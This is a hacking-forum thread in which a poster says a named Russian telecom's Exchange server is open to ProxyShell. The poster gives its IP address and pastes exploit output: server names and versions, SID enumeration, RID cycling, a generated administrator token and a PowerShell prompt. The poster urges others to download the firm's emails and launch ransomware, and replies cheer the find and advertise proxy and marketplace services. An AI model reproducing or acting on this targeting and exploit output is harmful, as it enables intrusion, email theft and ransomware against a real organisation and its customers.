Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



   427

[Telecom] bigtelecom.ru Vulnerable!

by SherlockHemredge - 05 April, 2022 - 09:46 PM
This post is by a banned member (SherlockHemredge) - Unhide
41
Posts
15
Threads
3 Years of service
#1
(This post was last modified: 05 April, 2022 - 09:57 PM by SherlockHemredge. Edited 2 times in total.)
So i have recently found https://bigtelecom.ru/ to be vulnerable to proxyshell. I know right now that a lot of h4x0rs are against russia so if anyone viewing this wishes to go further with this target then be my guest. Now it's public you'll need to be quick before they patch their exchange server!

From here you could download all their emails, try and get admin to then launch ransomware. It's up to you lol2

POC: 87.255.0.101
[+] Exchange Backend Servers: ['adfs.bigtelecom.ru']
[+]     adfs.bigtelecom.ru - version: 15.2.858.2
[+]     adfs.bigtelecom.ru - version_short: Exchange Server 2019
[+]     adfs.bigtelecom.ru - user: NT AUTHORITY\СИСТЕМА
[+]     adfs.bigtelecom.ru - sid: S-1-5-18
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 0 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'bigtelecom.ru'}
[+] Attempting to discover SID via 7 builtin email combinations
[+]     Retrieved LegacyDN: /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+]     Identified backend SMTP domain: bigtelecom.ru
[+]     Attempting to retrieve SID for /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+]     Successfully parsed SID via UserMailbox object: S-1-5-21-811240374-227453161-2850703647-500
[-] No emails enumerated - skipping SID discovery via this method
[-] Failed finding SID via user emails
[+] RID Cycled: S-1-5-21-811240374-227453161-2850703647-500
[+] Generated token for [email protected] - S-1-5-21-811240374-227453161-2850703647-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBtBZG1pbmlzdHJhdG9yQGJpZ3RlbGVjb20ucnVVK1MtMS01LTIxLTgxMTI0MDM3NC0yMjc0NTMxNjEtMjg1MDcwMzY0Ny01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=
PS> Get-Mailbox (https://archive.ph/bP5uU)
This post is by a banned member (Heaven) - Unhide
Heaven  
Galactic
3.725
Posts
473
Threads
4 Years of service
#2
wow thats fucking awesome ngl
[Image: VNimEzP.gif%20Hproxy.com%20Resisdential%20Proxies]
Check it out Hproxy.com

Wanna advertise your Service for free?
↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓↓
t.me/heavensmarketplace
 
 
 
 
 
 
 
 
This post is by a banned member (SherlockHemredge) - Unhide
41
Posts
15
Threads
3 Years of service
#3
(05 April, 2022 - 10:40 PM)ILostmyNuts Wrote: Show More
wow thats fucking awesome ngl

Thanks. Was a nice find kek
This post is by a banned member (SherlockHemredge) - Unhide
41
Posts
15
Threads
3 Years of service
#4
(This post was last modified: 08 April, 2022 - 11:57 PM by SherlockHemredge. Edited 1 time in total.)
Sabers

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)